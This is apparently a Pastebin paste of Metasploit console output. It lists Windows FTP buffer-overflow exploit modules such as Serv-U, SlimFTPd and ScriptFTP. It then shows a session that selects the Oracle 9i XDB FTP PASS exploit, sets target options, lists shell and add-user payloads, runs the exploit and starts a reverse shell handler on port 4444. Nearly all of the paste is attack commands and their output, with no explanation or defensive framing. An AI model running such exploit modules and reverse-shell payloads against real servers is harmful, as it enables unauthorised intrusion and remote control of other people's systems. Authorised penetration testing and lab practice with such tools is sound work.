Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- KarjaSoft Sami FTP Server v2.02 USER Overflow
- exploit/windows/ftp/sasser_ftpd_port 2004-05-10 average Sasser Worm avserve FTP PORT Buffer Overflow
- exploit/windows/ftp/scriptftp_list 2011-10-12 good ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)
- exploit/windows/ftp/seagull_list_reply 2010-10-12 good Seagull FTP v3.3 Build 409 Stack Buffer Overflow
- exploit/windows/ftp/servu_chmod 2004-12-31 normal Serv-U FTP Server < 4.2 Buffer Overflow
- exploit/windows/ftp/servu_mdtm 2004-02-26 good Serv-U FTPD MDTM Overflow
- exploit/windows/ftp/slimftpd_list_concat 2005-07-21 great SlimFTPd LIST Concatenation Overflow
- exploit/windows/ftp/trellian_client_pasv 2010-04-11 normal
- msf > use exploit/windows/ftp/oracle9i_xdb_ftp_pass
- msf exploit(oracle9i_xdb_ftp_pass) >
- msf exploit(oracle9i_xdb_ftp_pass) > show options
- Module options (exploit/windows/ftp/oracle9i_xdb_ftp_pass):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- RHOST yes The target address
- RPORT 2100 yes The target port
- Exploit target:
- Id Name
- -- ----
- 0 Oracle 9.2.0.1 Universal
- msf exploit(oracle9i_xdb_ftp_pass) > show payloads
- Compatible Payloads
- ===================
- Name Disclosure Date Rank Description
- ---- --------------- ---- -----------
- generic/custom normal Custom Payload
- generic/debug_trap normal Generic x86 Debug Trap
- generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
- generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
- generic/tight_loop normal Generic x86 Tight Loop
- windows/adduser normal Win
- msf exploit(oracle9i_xdb_ftp_pass) > exploit
- [*] Started reverse handler on 10.0.2.15:4444
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement